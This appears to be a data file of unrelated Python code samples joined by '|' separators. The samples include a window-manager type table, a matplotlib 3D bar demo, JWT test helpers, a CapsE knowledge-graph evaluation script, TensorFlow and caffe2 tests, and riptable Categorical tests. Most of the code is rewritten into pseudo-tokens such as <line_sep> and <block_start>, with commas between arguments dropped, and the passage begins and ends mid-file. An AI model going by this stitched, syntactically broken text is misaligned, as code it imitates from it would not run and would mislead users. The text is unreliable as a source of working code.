"""<line_sep>types=[HlwmType(name='bool' from_user_str=bool_from_user_str to_user_str=<lambda>b:'true'<if>b<else>'false' is_instance=<lambda>x:isinstance(x bool)) HlwmType(name='int' from_user_str=int to_user_str=str is_instance=<lambda>x:isinstance(x int)) # there is no uint in python, so we just convert it to 'int'
HlwmType(name='uint' from_user_str=int to_user_str=str is_instance=<lambda>x:<false>) HlwmType(name='rectangle' from_user_str=Rectangle.from_user_str to_user_str=Rectangle.to_user_str is_instance=<lambda>x:isinstance(x Rectangle)) HlwmType(name='string' from_user_str=<lambda>x:x to_user_str=<lambda>x:x is_instance=<lambda>x:isinstance(x str)) ]<line_sep><return>types<block_end><def_stmt>bool_from_user_str bool_string<block_start>"""Parse a string description of a hlwm boolean to
a python boolean"""<if_stmt>bool_string.lower()<in>['true' 'on']<block_start><return><true><block_end><if_stmt>bool_string.lower()<in>['false' 'off']<block_start><return><false><block_end><raise>Exception(f'"{bool_string}" is not a boolean')<block_end>
|
"""
=====================
Demo of 3D bar charts
=====================
A basic demo of how to plot 3D bars with and without
shading.
"""<import_stmt>numpy<as>np<import_stmt>matplotlib.pyplot<as>plt<line_sep># This import registers the 3D projection, but is otherwise unused.
<import_from_stmt>mpl_toolkits.mplot3d Axes3D# noqa: F401 unused import
# set up the figure and axes
fig=plt.figure(figsize=(8 3))<line_sep>ax1=fig.add_subplot(121 projection='3d')<line_sep>ax2=fig.add_subplot(122 projection='3d')<line_sep># fake data
_x=np.arange(4)<line_sep>_y=np.arange(5)<line_sep>_xx,_yy=np.meshgrid(_x _y)<line_sep>x,y=_xx.ravel() _yy.ravel()<line_sep>top=x+y<line_sep>bottom=np.zeros_like(top)<line_sep>width=depth=1<line_sep>ax1.bar3d(x y bottom width depth top shade=<true>)<line_sep>ax1.set_title('Shaded')<line_sep>ax2.bar3d(x y bottom width depth top shade=<false>)<line_sep>ax2.set_title('Not Shaded')<line_sep>plt.show()<line_sep>
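# --- illustrative note (not part of the original demo) ---
# The meshgrid/ravel step turns the 4 x-positions and 5 y-positions into one flat
# (x, y) anchor pair per bar, so bar3d receives one bottom/width/depth/top per bar:
#   _xx, _yy = np.meshgrid(np.arange(4), np.arange(5))
#   _xx.shape          # (5, 4): 20 bars in total
#   _xx.ravel().shape  # (20,): one flat x anchor per bar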
|
"""Define several typing for convenient use"""<import_from_stmt>typing Union Callable Optional Any List<import_stmt>numpy<as>np<import_from_stmt>pymatgen.core Structure Molecule<line_sep>OptStrOrCallable=Optional[Union[str Callable[<ellipsis> Any]]]<line_sep>StructureOrMolecule=Union[Structure Molecule]<line_sep>VectorLike=Union[List[float] np.ndarray]<line_sep>
|
<import_stmt>base64<import_stmt>json<import_from_stmt>dataclasses dataclass<import_from_stmt>typing Any Dict Iterable List Tuple<import_stmt>pytest<import_from_stmt>fastapi HTTPException<import_from_stmt>fastapi.security HTTPAuthorizationCredentials<import_from_stmt>fastapi.testclient TestClient<import_from_stmt>pydantic.main BaseModel<import_from_stmt>requests.models Response<import_from_stmt>fastapi_cloudauth.base ScopedAuth UserInfoAuth<import_from_stmt>fastapi_cloudauth.verification JWKsVerifier<line_sep>@dataclass<class_stmt>Auths<block_start>protect_auth:ScopedAuth<line_sep>protect_auth_ne:ScopedAuth<line_sep>ms_auth:UserInfoAuth<line_sep>ms_auth_ne:UserInfoAuth<line_sep>invalid_ms_auth:UserInfoAuth<line_sep>invalid_ms_auth_ne:UserInfoAuth<line_sep>valid_claim:BaseModel<line_sep>invalid_claim:BaseModel<block_end><class_stmt>BaseTestCloudAuth<block_start>"""
Required hooks for each test case:
setup: initialize the test case
teardown: delete the items created for the test
decode: check the decoded token and the assigned user info
"""<line_sep>ACCESS_TOKEN=""<line_sep>SCOPE_ACCESS_TOKEN=""<line_sep>ID_TOKEN=""<line_sep>TESTAUTH:Auths<def_stmt>setup self scope:Iterable[str]<arrow><none><block_start><ellipsis><block_end># pragma: no cover
<def_stmt>teardown self<arrow><none><block_start><ellipsis><block_end># pragma: no cover
<def_stmt>decode self<arrow><none><block_start><ellipsis><block_end><block_end># pragma: no cover
<def_stmt>assert_get_response client:TestClient endpoint:str token:str status_code:int detail:str=""<arrow>Response<block_start><if_stmt>token<block_start>headers={"authorization":f"Bearer {token}"}<block_end><else_stmt><block_start>headers={}<block_end>response=client.get(endpoint headers=headers)<assert_stmt>response.status_code<eq>status_code f"{response.json()}"<if_stmt>detail<block_start><assert_stmt>response.json().get("detail" "")<eq>detail<block_end><return>response<block_end><def_stmt>_assert_verifier token verifier:JWKsVerifier<arrow>HTTPException<block_start>http_auth=HTTPAuthorizationCredentials(scheme="a" credentials=token)<with_stmt>pytest.raises(HTTPException)<as>e<block_start>verifier._verify_claims(http_auth)<block_end><return>e.value<block_end><def_stmt>_assert_verifier_no_error token verifier:JWKsVerifier<arrow><none><block_start>http_auth=HTTPAuthorizationCredentials(scheme="a" credentials=token)<assert_stmt>verifier._verify_claims(http_auth)<is><false><block_end><def_stmt>decode_token token:str<arrow>Tuple[Dict[str Any] Dict[str Any] List[str]]<block_start>header,payload,*rest=token.split(".")<line_sep>header<augadd>f"{'='<times>(len(header)%4)}"<line_sep>payload<augadd>f"{'='<times>(len(payload)%4)}"<line_sep>_header=json.loads(base64.b64decode(header).decode())<line_sep>_payload=json.loads(base64.b64decode(payload).decode())<line_sep><return>_header _payload rest<block_end>
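# --- illustrative usage (not part of the original helpers; plain Python, hypothetical token) ---
# decode_token() re-pads and base64-decodes the header/payload segments of a
# JWT-style string; a hand-built token is enough to see the shape of the result:
def _example_decode_token() -> None:
    header_seg = base64.b64encode(json.dumps({"alg": "RS256"}).encode()).decode().rstrip("=")
    payload_seg = base64.b64encode(json.dumps({"sub": "user-123"}).encode()).decode().rstrip("=")
    header, payload, rest = decode_token(f"{header_seg}.{payload_seg}.sig")
    assert header["alg"] == "RS256" and payload["sub"] == "user-123" and rest == ["sig"]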
|
<import_stmt>tensorflow<as>tf<import_from_stmt>scipy.stats rankdata<import_stmt>numpy<as>np<import_stmt>os<import_stmt>time<import_stmt>datetime<import_from_stmt>argparse ArgumentParser ArgumentDefaultsHelpFormatter<import_from_stmt>builddata_softplus *<import_from_stmt>capsuleNet CapsE<line_sep># Parameters
# ==================================================
parser=ArgumentParser("CapsE" formatter_class=ArgumentDefaultsHelpFormatter conflict_handler='resolve')<line_sep>parser.add_argument("--data" default="./data/" help="Data sources.")<line_sep>parser.add_argument("--run_folder" default="./" help="Data sources.")<line_sep>parser.add_argument("--name" default="WN18RR" help="Name of the dataset.")<line_sep>parser.add_argument("--embedding_dim" default=100 type=int help="Dimensionality of character embedding (default: 128)")<line_sep>parser.add_argument("--filter_size" default=1 type=int help="Comma-separated filter sizes (default: '3,4,5')")<line_sep>parser.add_argument("--num_filters" default=400 type=int help="Number of filters per filter size (default: 128)")<line_sep>parser.add_argument("--learning_rate" default=0.00001 type=float help="Learning rate")<line_sep>parser.add_argument("--batch_size" default=128 type=int help="Batch Size")<line_sep>parser.add_argument("--neg_ratio" default=1.0 help="Number of negative triples generated by positive (default: 1.0)")<line_sep>parser.add_argument("--useInitialization" default=<true> type=bool help="Using the pretrained embeddings")<line_sep>parser.add_argument("--num_epochs" default=51 type=int help="Number of training epochs")<line_sep>parser.add_argument("--savedEpochs" default=10 type=int help="")<line_sep>parser.add_argument("--allow_soft_placement" default=<true> type=bool help="Allow device soft device placement")<line_sep>parser.add_argument("--log_device_placement" default=<false> type=bool help="Log placement of ops on devices")<line_sep>parser.add_argument("--model_name" default='wn18rr_400_4' help="")<line_sep>parser.add_argument("--useConstantInit" action='store_true')<line_sep>parser.add_argument('--iter_routing' default=1 type=int help='number of iterations in routing algorithm')<line_sep>parser.add_argument('--num_outputs_secondCaps' default=1 type=int help='')<line_sep>parser.add_argument('--vec_len_secondCaps' default=10 type=int help='')<line_sep>parser.add_argument("--model_index" default='30')<line_sep>parser.add_argument("--num_splits" default=8 type=int)<line_sep>parser.add_argument("--testIdx" default=1 type=int help="From 0 to 7")<line_sep>parser.add_argument("--decode" action='store_false')<line_sep>args=parser.parse_args()<line_sep>print(args)<line_sep># Load data
print("Loading data...")<line_sep>train,valid,test,words_indexes,indexes_words,headTailSelector,entity2id,id2entity,relation2id,id2relation=build_data(path=args.data name=args.name)<line_sep>data_size=len(train)<line_sep>train_batch=Batch_Loader(train words_indexes indexes_words headTailSelector entity2id id2entity relation2id id2relation batch_size=args.batch_size neg_ratio=args.neg_ratio)<line_sep>entity_array=np.array(list(train_batch.indexes_ents.keys()))<line_sep>initialization=[]<if_stmt>args.useInitialization<eq><true><block_start>print("Using pre-trained initialization.")<line_sep>initialization=np.empty([len(words_indexes) args.embedding_dim]).astype(np.float32)<line_sep>initEnt,initRel=init_norm_Vector(args.data+args.name+'/relation2vec'+str(args.embedding_dim)+'.init' args.data+args.name+'/entity2vec'+str(args.embedding_dim)+'.init' args.embedding_dim)<for_stmt>_word words_indexes<block_start><if_stmt>_word<in>relation2id<block_start>index=relation2id[_word]<line_sep>_ind=words_indexes[_word]<line_sep>initialization[_ind]=initRel[index]<block_end><elif_stmt>_word<in>entity2id<block_start>index=entity2id[_word]<line_sep>_ind=words_indexes[_word]<line_sep>initialization[_ind]=initEnt[index]<block_end><else_stmt><block_start>print('*****************Error********************!')<line_sep><break><block_end><block_end>initialization=np.array(initialization dtype=np.float32)<assert_stmt>len(words_indexes)%(len(entity2id)+len(relation2id))<eq>0<block_end>print("Loading data... finished!")<line_sep>x_valid=np.array(list(valid.keys())).astype(np.int32)<line_sep>y_valid=np.array(list(valid.values())).astype(np.float32)<line_sep>len_valid=len(x_valid)<line_sep>batch_valid=int(len_valid/(args.num_splits-1))<line_sep>x_test=np.array(list(test.keys())).astype(np.int32)<line_sep>y_test=np.array(list(test.values())).astype(np.float32)<line_sep>len_test=len(x_test)<line_sep>batch_test=int(len_test/(args.num_splits-1))<line_sep># uncomment when tuning hyper-parameters on the validation set
# x_test = x_valid
# y_test = y_valid
# len_test = len_valid
# batch_test = batch_valid
##########################################
<if_stmt>args.decode<eq><false><block_start>lstModelNames=list(args.model_name.split(","))<for_stmt>_model_name lstModelNames<block_start>out_dir=os.path.abspath(os.path.join(args.run_folder "runs_CapsE" _model_name))<line_sep>print("Evaluating {}\n".format(out_dir))<line_sep>checkpoint_dir=os.path.abspath(os.path.join(out_dir "checkpoints"))<line_sep>checkpoint_prefix=os.path.join(checkpoint_dir "model")<line_sep>lstModelIndexes=list(args.model_index.split(","))<for_stmt>_model_index lstModelIndexes<block_start>_file=checkpoint_prefix+"-"+_model_index<line_sep>lstHT=[]<for_stmt>_index range(args.num_splits)<block_start><with_stmt>open(_file+'.eval.'+str(_index)+'.txt')<as>f<block_start><for_stmt>_line f<block_start><if_stmt>_line.strip()<ne>''<block_start>lstHT.append(list(map(float _line.strip().split())))<block_end><block_end><block_end><block_end>lstHT=np.array(lstHT)<line_sep>print(_file 'mr, mrr, hits@1, hits@10 --> ' np.sum(lstHT axis=0)/(2<times>len_test))<block_end>print('------------------------------------')<block_end><block_end><else_stmt><block_start><with_stmt>tf.Graph().as_default()<block_start>tf.set_random_seed(1234)<line_sep>session_conf=tf.ConfigProto(allow_soft_placement=args.allow_soft_placement log_device_placement=args.log_device_placement)<line_sep>session_conf.gpu_options.allow_growth=<true><line_sep>sess=tf.Session(config=session_conf)<with_stmt>sess.as_default()<block_start>global_step=tf.Variable(0 name="global_step" trainable=<false>)<line_sep>capse=CapsE(sequence_length=x_valid.shape[1] initialization=initialization embedding_size=args.embedding_dim filter_size=args.filter_size num_filters=args.num_filters vocab_size=len(words_indexes) iter_routing=args.iter_routing batch_size=2<times>args.batch_size num_outputs_secondCaps=args.num_outputs_secondCaps vec_len_secondCaps=args.vec_len_secondCaps useConstantInit=args.useConstantInit)<line_sep># Output directory for models and summaries
lstModelNames=list(args.model_name.split(","))<for_stmt>_model_name lstModelNames<block_start>out_dir=os.path.abspath(os.path.join(args.run_folder "runs_CapsE" _model_name))<line_sep>print("Evaluating {}\n".format(out_dir))<line_sep># Checkpoint directory. Tensorflow assumes this directory already exists so we need to create it
checkpoint_dir=os.path.abspath(os.path.join(out_dir "checkpoints"))<line_sep>checkpoint_prefix=os.path.join(checkpoint_dir "model")<line_sep>lstModelIndexes=list(args.model_index.split(","))<for_stmt>_model_index lstModelIndexes<block_start>_file=checkpoint_prefix+"-"+_model_index<line_sep>capse.saver.restore(sess _file)<line_sep>print("Loaded model" _file)<line_sep># Predict function to predict scores for test data
<def_stmt>predict x_batch y_batch writer=<none><block_start>feed_dict={capse.input_x:x_batch capse.input_y:y_batch}<line_sep>scores=sess.run([capse.predictions] feed_dict)<line_sep><return>scores<block_end><def_stmt>test_prediction x_batch y_batch head_or_tail='head'<block_start>hits10=0.0<line_sep>mrr=0.0<line_sep>mr=0.0<line_sep>hits1=0.0<for_stmt>i range(len(x_batch))<block_start>new_x_batch=np.tile(x_batch[i] (len(entity2id) 1))<line_sep>new_y_batch=np.tile(y_batch[i] (len(entity2id) 1))<if_stmt>head_or_tail<eq>'head'<block_start>new_x_batch[: 0]=entity_array<block_end><else_stmt># 'tail'
<block_start>new_x_batch[: 2]=entity_array<block_end>lstIdx=[]<for_stmt>tmpIdxTriple range(len(new_x_batch))<block_start>tmpTriple=(new_x_batch[tmpIdxTriple][0] new_x_batch[tmpIdxTriple][1] new_x_batch[tmpIdxTriple][2])<if_stmt>(tmpTriple<in>train)<or>(tmpTriple<in>valid)<or>(tmpTriple<in>test)# also remove the valid test triple
<block_start>lstIdx.append(tmpIdxTriple)<block_end><block_end>new_x_batch=np.delete(new_x_batch lstIdx axis=0)<line_sep>new_y_batch=np.delete(new_y_batch lstIdx axis=0)<line_sep># thus, insert the valid test triple again, to the beginning of the array
new_x_batch=np.insert(new_x_batch 0 x_batch[i] axis=0)# thus, the index of the valid test triple is equal to 0
new_y_batch=np.insert(new_y_batch 0 y_batch[i] axis=0)<line_sep># for running with a batch size
<while_stmt>len(new_x_batch)%((int(args.neg_ratio)+1)<times>args.batch_size)<ne>0<block_start>new_x_batch=np.append(new_x_batch [x_batch[i]] axis=0)<line_sep>new_y_batch=np.append(new_y_batch [y_batch[i]] axis=0)<block_end>results=[]<line_sep>listIndexes=range(0 len(new_x_batch) (int(args.neg_ratio)+1)<times>args.batch_size)<for_stmt>tmpIndex range(len(listIndexes)-1)<block_start>results=np.append(results predict(new_x_batch[listIndexes[tmpIndex]:listIndexes[tmpIndex+1]] new_y_batch[listIndexes[tmpIndex]:listIndexes[tmpIndex+1]]))<block_end>results=np.append(results predict(new_x_batch[listIndexes[-1]:] new_y_batch[listIndexes[-1]:]))<line_sep>results=np.reshape(results -1)<line_sep>results_with_id=rankdata(results method='ordinal')<line_sep>_filter=results_with_id[0]<line_sep>mr<augadd>_filter<line_sep>mrr<augadd>1.0/_filter<if_stmt>_filter<le>10<block_start>hits10<augadd>1<block_end><if_stmt>_filter<eq>1<block_start>hits1<augadd>1<block_end><block_end><return>np.array([mr mrr hits1 hits10])<block_end><if_stmt>args.testIdx<l>(args.num_splits-1)<block_start>head_results=test_prediction(x_test[batch_test<times>args.testIdx:batch_test<times>(args.testIdx+1)] y_test[batch_test<times>args.testIdx:batch_test<times>(args.testIdx+1)] head_or_tail='head')<line_sep>tail_results=test_prediction(x_test[batch_test<times>args.testIdx:batch_test<times>(args.testIdx+1)] y_test[batch_test<times>args.testIdx:batch_test<times>(args.testIdx+1)] head_or_tail='tail')<block_end><else_stmt><block_start>head_results=test_prediction(x_test[batch_test<times>args.testIdx:len_test] y_test[batch_test<times>args.testIdx:len_test] head_or_tail='head')<line_sep>tail_results=test_prediction(x_test[batch_test<times>args.testIdx:len_test] y_test[batch_test<times>args.testIdx:len_test] head_or_tail='tail')<block_end>wri=open(_file+'.eval.'+str(args.testIdx)+'.txt' 'w')<for_stmt>_val head_results<block_start>wri.write(str(_val)+' ')<block_end>wri.write('\n')<for_stmt>_val tail_results<block_start>wri.write(str(_val)+' ')<block_end>wri.write('\n')<line_sep>wri.close()<block_end><block_end><block_end><block_end><block_end>
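# --- illustrative sketch (not part of the original script; plain Python) ---
# test_prediction() above implements the standard "filtered" ranking protocol: known
# true triples are removed from the candidate list, the test triple is re-inserted at
# index 0, and its rank among the predicted scores yields MR / MRR / Hits@1 / Hits@10
# (rankdata gives rank 1 to the smallest score, so lower scores rank better here).
# Condensed, with made-up scores:
def _ranking_metrics_sketch():
    scores = np.array([0.3, 0.1, 0.7, 0.2])       # index 0 is the held-out test triple
    rank = rankdata(scores, method='ordinal')[0]  # -> 3
    return rank, 1.0 / rank, float(rank <= 1), float(rank <= 10)  # mr, mrr, hits@1, hits@10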
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Test Cases for PoolingEncoder.
"""<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_from_future_stmt> unicode_literals<import_stmt>tensorflow<as>tf<import_stmt>numpy<as>np<import_from_stmt>seq2seq.encoders PoolingEncoder<class_stmt>PoolingEncoderTest(tf.test.TestCase)<block_start>"""
Tests the PoolingEncoder class.
"""<def_stmt>setUp self<block_start>super(PoolingEncoderTest self).setUp()<line_sep>self.batch_size=4<line_sep>self.sequence_length=16<line_sep>self.input_depth=10<line_sep>self.mode=tf.contrib.learn.ModeKeys.TRAIN<block_end><def_stmt>_test_with_params self params<block_start>"""Tests the encoder with a given parameter configuration"""<line_sep>inputs=tf.random_normal([self.batch_size self.sequence_length self.input_depth])<line_sep>example_length=tf.ones(self.batch_size dtype=tf.int32)<times>self.sequence_length<line_sep>encode_fn=PoolingEncoder(params self.mode)<line_sep>encoder_output=encode_fn(inputs example_length)<with_stmt>self.test_session()<as>sess<block_start>sess.run(tf.global_variables_initializer())<line_sep>encoder_output_=sess.run(encoder_output)<block_end>np.testing.assert_array_equal(encoder_output_.outputs.shape [self.batch_size self.sequence_length self.input_depth])<line_sep>np.testing.assert_array_equal(encoder_output_.attention_values.shape [self.batch_size self.sequence_length self.input_depth])<line_sep>np.testing.assert_array_equal(encoder_output_.final_state.shape [self.batch_size self.input_depth])<block_end><def_stmt>test_encode_with_pos self<block_start>self._test_with_params({"position_embeddings.enable":<true> "position_embeddings.num_positions":self.sequence_length})<block_end><def_stmt>test_encode_without_pos self<block_start>self._test_with_params({"position_embeddings.enable":<false> "position_embeddings.num_positions":0})<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>tf.test.main()<block_end>
|
#!python3
<import_from_stmt>datetime date<import_from_stmt>src.allocations_familiales PriseEnCharge_Code Collectivite_Code<import_from_stmt>src.api allocations_familiales Enfant<import_from_stmt>src.catala LogEvent LogEventCode reset_log retrieve_log<import_stmt>timeit<import_stmt>argparse<import_from_stmt>typing List Any<import_from_stmt>termcolor colored<def_stmt>call_allocations_familiales <arrow>float<block_start><return>allocations_familiales(date_courante=date(2020 4 20) enfants=[Enfant(id=0 remuneration_mensuelle=0 date_de_naissance=date(2003 2 2) prise_en_charge=PriseEnCharge_Code.EffectiveEtPermanente a_deja_ouvert_droit_aux_allocations_familiales=<true>) Enfant(id=1 remuneration_mensuelle=300 date_de_naissance=date(2013 9 30) prise_en_charge=PriseEnCharge_Code.GardeAlterneePartageAllocations a_deja_ouvert_droit_aux_allocations_familiales=<true>)] ressources_menage=30000 residence=Collectivite_Code.Metropole personne_charge_effective_permanente_est_parent=<true> personne_charge_effective_permanente_remplit_titre_I=<true> )<block_end><def_stmt>benchmark_iteration <block_start>money_given=call_allocations_familiales()<assert_stmt>(money_given<eq>99.37)<block_end><def_stmt>run_with_log <arrow>List[LogEvent]<block_start>money_given=call_allocations_familiales()<assert_stmt>(money_given<eq>99.37)<line_sep>log=retrieve_log()<line_sep>reset_log()<line_sep><return>log<block_end><def_stmt>print_value v:Any<arrow>str<block_start><if_stmt>isinstance(v list)<block_start><return>"["+",".join([str(x)<for>x v])+"]"<block_end><else_stmt><block_start><return>str(v)<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>parser=argparse.ArgumentParser(description='French law library in Python')<line_sep>parser.add_argument('action' metavar='ACTION' type=str nargs=1 help="'bench' or 'show_log'")<line_sep>args=parser.parse_args()<line_sep>action=args.action[0]<if_stmt>action<eq>"bench"<block_start>iterations=10000<line_sep>print("Iterating {} iterations of the family benefits computation. Total time (s):".format(iterations))<line_sep>print(timeit.timeit(benchmark_iteration number=iterations))<block_end><elif_stmt>action<eq>"show_log"<block_start>log=run_with_log()<line_sep>indentation=0<for_stmt>log_event log<block_start><if_stmt>log_event.code<eq>LogEventCode.BeginCall<block_start>print("{}{} {}".format("".ljust(indentation) colored("Begin call:" "yellow") colored(" >> ".join(log_event.payload) "magenta")))<line_sep># type: ignore
indentation<augadd>2<block_end><elif_stmt>log_event.code<eq>LogEventCode.EndCall<block_start>indentation<augsub>2<line_sep>print("{}{} {}".format("".ljust(indentation) colored("End call:" "yellow") colored(" >> ".join(log_event.payload) "magenta")))<line_sep># type: ignore
<block_end><elif_stmt>log_event.code<eq>LogEventCode.VariableDefinition<block_start>headings,value=log_event.payload# type: ignore
print("{}{} {} {} {}".format("".ljust(indentation) colored("Variable definition:" "blue") colored(" >> ".join(headings) "magenta") colored(":=" "blue") colored(print_value(value) "green")))<line_sep># type: ignore
<block_end><elif_stmt>log_event.code<eq>LogEventCode.DecisionTaken<block_start>print("{}{} {}".format("".ljust(indentation) colored("Decision taken:" "green") colored("{}".format(log_event.payload) "magenta")))<line_sep># type: ignore
<block_end><block_end><block_end><else_stmt><block_start>print("Action '{}' not recognized!".format(action))<line_sep>exit(-1)<block_end><block_end>
|
<import_stmt>torch.nn<as>nn<class_stmt>RNNDropout(nn.Dropout)<block_start>"""Dropout for RNN."""<def_stmt>forward self sequences_batch<block_start>"""Mask whole hidden vectors: the same features are dropped for every token in the sequence."""<line_sep># B: batch size
# L: sequence length
# D: hidden size
# sequence_batch: BxLxD
ones=sequences_batch.data.new_ones(sequences_batch.shape[0] sequences_batch.shape[-1])<line_sep>dropout_mask=nn.functional.dropout(ones self.p self.training inplace=<false>)<line_sep><return>dropout_mask.unsqueeze(1)<times>sequences_batch<block_end><block_end>
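# --- illustrative check (not part of the original module) ---
# Because the mask is built with shape (B, D) and broadcast over L, the same hidden
# units are dropped at every time step of a given example:
if __name__ == "__main__":
    import torch
    drop = RNNDropout(p=0.5)
    drop.train()                      # dropout is only active in training mode
    out = drop(torch.ones(2, 4, 8))   # B=2, L=4, D=8
    assert torch.equal(out[:, 0, :] == 0, out[:, -1, :] == 0)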
|
<import_from_stmt>caffe2.python core<import_from_stmt>hypothesis given<import_stmt>caffe2.python.hypothesis_test_util<as>hu<import_stmt>hypothesis.strategies<as>st<import_stmt>numpy<as>np<class_stmt>TestLars(hu.HypothesisTestCase)<block_start>@given(offset=st.floats(min_value=0 max_value=100) lr_min=st.floats(min_value=1e-8 max_value=1e-6) **hu.gcs)<def_stmt>test_lars self offset lr_min dc gc<block_start>X=np.random.rand(6 7 8 9).astype(np.float32)<line_sep>dX=np.random.rand(6 7 8 9).astype(np.float32)<line_sep>wd=np.array([1e-4]).astype(np.float32)<line_sep>trust=np.random.rand(1).astype(np.float32)<line_sep>lr_max=np.random.rand(1).astype(np.float32)<def_stmt>ref_lars X dX wd trust lr_max<block_start>rescale_factor=trust/(np.linalg.norm(dX)/np.linalg.norm(X)+wd+offset)<line_sep>rescale_factor=np.minimum(rescale_factor lr_max)<line_sep>rescale_factor=np.maximum(rescale_factor lr_min)<line_sep><return>[rescale_factor]<block_end>op=core.CreateOperator("Lars" ["X" "dX" "wd" "trust" "lr_max"] ["rescale_factor"] offset=offset lr_min=lr_min )<line_sep>self.assertReferenceChecks(device_option=gc op=op inputs=[X dX wd trust lr_max] reference=ref_lars)<block_end><block_end>
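# --- illustrative restatement (not part of the original test; plain Python) ---
# ref_lars() above encodes the LARS trust-ratio the operator is expected to match:
#   rescale = clip(trust / (||dX|| / ||X|| + wd + offset), lr_min, lr_max)
def _lars_rescale(X, dX, wd, trust, lr_min, lr_max, offset):
    ratio = trust / (np.linalg.norm(dX) / np.linalg.norm(X) + wd + offset)
    return np.clip(ratio, lr_min, lr_max)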
|
<import_from_stmt>waliki.models Page<import_from_stmt>haystack indexes<class_stmt>PageIndex(indexes.SearchIndex indexes.Indexable)<block_start>text=indexes.CharField(document=<true> use_template=<true>)<def_stmt>get_model self<block_start><return>Page<block_end><block_end>
|
<import_stmt>pytest<import_stmt>os<import_stmt>pandas<as>pd<import_stmt>riptable<as>rt<import_from_stmt>enum IntEnum<import_from_stmt>numpy.testing assert_array_equal<import_from_stmt>riptable *<import_from_stmt>riptable save_sds load_sds<import_from_stmt>riptable FastArray Categorical CatZero<import_from_stmt>riptable.rt_categorical Categories<import_from_stmt>riptable.rt_enum INVALID_DICT <import_from_stmt>riptable.rt_enum DisplayLength DisplayJustification DisplayColumnColors <import_from_stmt>riptable.rt_enum CategoryMode TypeRegister<import_from_stmt>riptable.rt_numpy isnan isnotnan arange ones<import_from_stmt>riptable.tests.test_utils get_categorical_data_factory_method get_all_categorical_data <import_from_stmt>riptable.rt_sds SDSMakeDirsOn<import_from_stmt>riptable.tests.utils LikertDecision<line_sep># change to true since we write into /tests directory
SDSMakeDirsOn()<line_sep>three_unicode=np.array(["AAPL\u2080" "AMZN\u2082" "IBM\u2081"])<line_sep>three_bytes=FastArray([b'a' b'b' b'c'])<line_sep>three_ints=FastArray([1 2 3])<line_sep>compare_func_names=['__ne__' '__eq__' '__ge__' '__gt__' '__le__' '__lt__']<line_sep>int_success=[np.array([<true> <false> <true>]) # ne
np.array([<false> <true> <false>]) # eq
np.array([<false> <true> <true>]) # ge
np.array([<false> <false> <true>]) # gt
np.array([<true> <true> <false>]) # le
np.array([<true> <false> <false>]) # lt
]<line_sep>same_success=[np.array([<false> <false> <false>]) # ne
np.array([<true> <true> <true>]) # eq
np.array([<true> <true> <true>]) # ge
np.array([<false> <false> <false>]) # gt
np.array([<true> <true> <true>]) # le
np.array([<false> <false> <false>]) # lt
]<line_sep>diff_success=[np.array([<true> <false> <true>]) # ne
np.array([<false> <true> <false>]) # eq
np.array([<false> <true> <false>]) # ge
np.array([<false> <false> <false>]) # gt
np.array([<true> <true> <true>]) # le
np.array([<true> <false> <true>]) # lt
]<line_sep>ShowCompareInfo=<false><line_sep>list_bytes=[b'b' b'b' b'a' b'd' b'c']<line_sep>list_unicode=['b' 'b' 'a' 'd' 'c']<line_sep>list_true_unicode=[u'b\u2082' u'b\u2082' u'a\u2082' u'd\u2082' u'c\u2082']<line_sep>decision_dict=dict(zip(LikertDecision.__members__.keys() [int(v)<for>v LikertDecision.__members__.values()] ))<def_stmt>array_equal arr1 arr2<block_start>subr=arr1-arr2<line_sep>sumr=sum(subr<eq>0)<line_sep>result=sumr<eq>len(arr1)<if_stmt><not>result<block_start>print("array comparison failed" arr1 arr2)<block_end><return>result<block_end><class_stmt>TestCategorical<block_start><def_stmt>_notimpl self<block_start>pytest.skip("This test needs to be implemented.")<block_end><def_stmt>test_constructor self# from pandas categorical
# from single parameter
# from two parameters
# ndarray
# python list
<block_start>self._notimpl()<block_end><def_stmt>test_ctor_list self<block_start>c_bytes=Categorical(list_bytes)<assert_stmt>c_bytes.dtype<eq>np.int8 f"Dtype {c_bytes.dtype} was not correct for construction from small list."<assert_stmt>len(c_bytes)<eq>5 f"Length of underlying index array was incorrect for construction from bytes."<line_sep>unique_bytes=np.unique(list_bytes)<assert_stmt>np.all(c_bytes._categories_wrap._list<eq>unique_bytes) f"Categories did not generate a unique list of categories from input bytes list."<line_sep>c_unicode=Categorical(list_unicode)<assert_stmt>c_unicode.dtype<eq>np.int8 f"Dtype {c_unicode.dtype} was not correct for construction from small list."<assert_stmt>len(c_unicode)<eq>5 f"Length of underlying index array was incorrect for construction from unicode."<assert_stmt>(len(c_unicode._categories_wrap)<eq>4) f"Length of unique categories was incorrect for construction from unicode."<assert_stmt>(c_unicode._categories_wrap._list[0]<eq>b'a') f"Unique categories were not sorted for construction from unicode."<assert_stmt>c_unicode._categories_wrap._list.dtype.char<eq>'S' f"Unicode strings were not flipped to byte strings."<line_sep>c_true_unicode=Categorical(list_true_unicode)<assert_stmt>(c_true_unicode.dtype<eq>np.int8) f"Dtype {c_true_unicode.dtype} was not correct for construction from small list."<assert_stmt>(len(c_true_unicode)<eq>5) f"Length of underlying index array was incorrect for construction from true unicode."<assert_stmt>(len(c_true_unicode._categories_wrap)<eq>4) f"Length of unique categories was incorrect for construction from true unicode."<assert_stmt>(c_true_unicode._categories_wrap._list[0]<eq>u'a\u2082') f"Unique categories were not sorted for construction from true unicode."<assert_stmt>(c_true_unicode._categories_wrap._list.dtype.char<eq>'U') f"Unicode strings were not flipped to byte strings."<block_end><def_stmt>test_ctor_nparray self<block_start>c_bytes=Categorical(np.array(list_bytes))<assert_stmt>c_bytes.dtype<eq>np.int8 f"Dtype {c_bytes.dtype} was not correct for construction from small list."<assert_stmt>len(c_bytes)<eq>5 f"Length of underlying index array was incorrect for construction from bytes."<line_sep>unique_bytes=np.unique(list_bytes)<assert_stmt>np.all(c_bytes._categories_wrap._list<eq>unique_bytes) f"Categories did not generate a unique list of categories from input bytes list."<line_sep>c_unicode=Categorical(np.array(list_unicode))<assert_stmt>c_unicode.dtype<eq>np.int8 f"Dtype {c_unicode.dtype} was not correct for construction from small list."<assert_stmt>len(c_unicode)<eq>5 f"Length of underlying index array was incorrect for 